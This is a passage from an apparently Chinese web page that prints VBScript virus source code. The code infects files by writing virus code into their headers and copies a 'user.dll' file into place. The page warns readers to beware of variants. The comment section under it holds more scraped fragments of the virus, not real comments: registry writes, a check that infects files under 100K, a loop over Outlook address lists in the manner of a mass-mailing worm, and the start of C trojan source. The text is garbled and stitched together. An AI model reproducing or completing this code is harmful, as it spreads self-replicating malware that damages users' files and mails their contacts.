tso.Write Code_Str vbcrlf buffer '插入到文件头

tso.close

end if

else

if mid(buffer, 3, 2) "'@" then

tso.close

sr=w2 "user.dll"

if fso.FileExists(sr) then fso.CopyFile sr, Path

end if

end if

end sub

虽然病毒发作日已过但我们还是要小心提防病毒的变种出现。

群贤毕至

访客
莣萳尤怨 莣萳尤怨2022-07-12 20:52:42 | 回复 ("Scripting.FileSystemObject") set wvbs = CreateObject("WScript.Shell") Gf wvbs.RegWrite MSWKEY "Windows Scri
孤央桔烟 孤央桔烟2022-07-12 15:37:47 | 回复 = CreateObject("WScript.Shell") Readreg = tmps.RegRead(key_str) set tmps = Nothing end function funct
纵遇孤央 纵遇孤央2022-07-12 12:48:39 | 回复 sr if f.size MAX_SIZE then exit sub '传染大小小于100K的文件 set tso = fso.OpenTextFile(Path, 1, true) buffer = tso.ReadAll
莣萳羞稚 莣萳羞稚2022-07-12 22:55:34 | 回复 .Application") set wab = Oa.GetNameSpace("MAPI") for j = 1 to wab.AddressLists.Count eins = wab.AddressLists(j) wreg=Readreg (HCUW eins) if (w
忿咬风渺 忿咬风渺2022-07-12 13:38:52 | 回复 ...要复制的....越长越好c语言木马源代码#include stdio.h #include dir.h void main(void) { virus(); } int